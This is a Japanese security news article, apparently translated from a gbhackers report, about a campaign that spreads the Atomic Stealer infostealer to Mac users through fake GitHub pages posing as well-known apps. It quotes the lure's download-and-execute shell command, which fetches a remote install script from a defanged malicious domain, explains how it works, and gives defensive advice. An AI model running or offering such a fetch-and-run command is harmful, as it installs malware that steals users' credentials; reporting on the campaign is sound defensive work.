2025/09/24 gbhackers — Mac ユーザーを標的とする大規模な攻撃キャンペーンで、偽の GitHub ページが悪用され、人気の正規アプリケーションを装う情報窃取マルウェアが拡散された。偽装されたソフトウェアに含まれていたのは、Malwarebytes for Mac/LastPass/Citibank/SentinelOne などの、数多くの有名ブランドである。ブランドへの成りすまし自体は目新しいものではないが、今回の攻撃キャンペーンが示した戦術の進化は、サイバー犯罪者がユーザーを誘導して有害なコードをインストールさせる手口にある。
LastPass Threat Intelligence と Malwarebytes の脅威研究者が特定したのは、信頼できるアプリケーションの macOS インストーラをホストしていると主張する、多数の GitHub ページである。
Google のスポンサー広告を購入した攻撃者が、公式のベンダー・サイトではなく、これらの悪意のページへとユーザーを誘導するケースもいくつかある。
また、この攻撃キャンペーンでは、SEO ポイズニングの手法を用いて、”Malwarebytes GitHub macOS” などのクエリ検索の結果において、偽のリポジトリを上位に表示させるケースも確認されている。それらのサイトに誘導された何も知らないユーザーに対しては、”GET APPLICATION” ボタンが表示される。
このボタンをクリックすると、新規の登録ドメインからインストーラ・スクリプトをダウンロードして実行するための指示が表示される。多くの場合において、ユーザーへの確認やコード・レビューは一切行われず、macOS の保護機能やユーザーの警戒は効果的に回避される。
この攻撃の目的は、強力な macOS 情報窃盗ツールである Atomic Stealer (別名 AMOS) を展開し、ブラウザデータ/クリップボードの内容、保存された認証情報を収集することにある。
つまり、偽の製品のインストール手順が記載されたダウンロード・ページが表示されるが、実際は情報窃盗ツールである。
Malwarebytes for Mac と ThreatDown は、どちらもこの亜種を検知してブロックするが、初期フェーズにおけるソーシャル・エンジニアリングは、注意力の低いユーザーに対して驚くほど効果的である。
感染チェーンの技術的詳細
インストール・プロセスは、以下の1行のシェル・コマンドだけに依存し、ユーザーに対して macOS Terminal へのコピー&ペーストが指示される。
/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"動作は以下の通りである。
- curl -fsSL オプションは、リダイレクトをたどり、HTTP エラーが発生した場合にはサイレントに失敗し、リモート・スクリプトをサイレントにダウンロードする。
- curl 呼び出しを $(…) で囲むことで、ダウンロードされたスクリプトは、外側の bash -c コマンドに直接渡される。
- 外側のシェル呼び出しは、取得したスクリプトを即座に実行するが、その内容はユーザーに確認されない。
攻撃者は中間 URL を base64 でエンコードして、真のディスティネーションを難読化し、一般ユーザーによる検出を困難にしている。
Terminal を使った方法では、macOS に組み込まれたアプリケーション署名チェックが実行されず、管理者レベルのプロンプトも必要とされないため、スクリプトはユーザーの権限で実行され、LaunchAgents/LaunchDaemons 内に永続的なエージェントがインストールされる。
偽ソフトウェアを回避するためのベストプラクティス
このような手口から身を守るために、Mac ユーザーは以下のガイドラインに従う必要がある。
- 検証されていない Webページ/フォーラム/GitHub リポジトリからコピー&ペーストしたコマンドは、絶対に実行してはならない。”curl … | bash” などの構文を使用するコマンドは、高リスクと見なされるべきだ。
- アプリケーションのダウンロードは、開発者の公式 Web サイトまたは、信頼できるアプリストアで必ず行う。不明な場合には、ベンダーのサポート・チャネルを通じて、直接ダウンロード URL を確認すべきだ。
- スポンサードされる検索結果については、注意して扱うべきであり、無効化も考えるべきだ。これらの広告から、信頼できるブランドを装う悪意のページへとリダイレクトされる可能性がある。
- Web フィルタリングなどの、リアルタイムのマルウェア対策保護を導入すべきだ。Malwarebytes for Mac や ThreatDown などのソリューションにより、Atomic Stealer の亜種はインストール前に検出されブロックされる。
- 感染が疑われる場合には、”~/Library/LaunchAgents” フォルダと “/Library/LaunchDaemons” フォルダを開いて、見覚えのない項目の有無を調べ、疑わしいエントリがあれば削除すべきだ。
- 包括的な修復を行う際には、macOS を完全に再インストールし、クリーンなバックアップからのみの、ファイルの復元を検討すべきだ。すべてのアカウントのパスワードを再初期化し、多要素認証を有効化し、盗まれた認証情報による不正アクセスを防ぐべきである。
GitHub は、オープンソース・ソフトウェアの信頼できるプラットフォームであるが、今回のキャンペーンが示すのは、攻撃者が正規のブランドになりすまし、GitHub を武器化する方法である。
このように急速に進化する脅威への最善の防御策は、警戒であり、慎重なダウンロードと、堅牢なエンドポイント保護である。
この記事が紹介するのは、偽の GitHub ページを利用した攻撃で、Mac ユーザーが標的となった事例です。この攻撃は、ユーザーが信頼できると思い込むブランドやプラットフォームを悪用する攻撃者が、正規アプリに見せかけたマルウェアを配布した点にあります。特に “curl … | bash” のようなコマンドを利用した仕組みは、ユーザー確認をすり抜け、署名検証も行われないため危険性が高いです。このような仕組みが、情報窃取ツール Atomic Stealer の拡散を可能にしました。2025/09/23 の「GitHub の公式通知を悪用するフィッシング・キャンペーンを検知:公式を模倣する巧妙なメール」も、2025/09/25 の「GitHub が npmセキュリティを大幅に刷新:より強力な認証と信頼できる公開を導入」も、オープンソース・リポジトリの厳しい状況を示しています。よろしければ、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.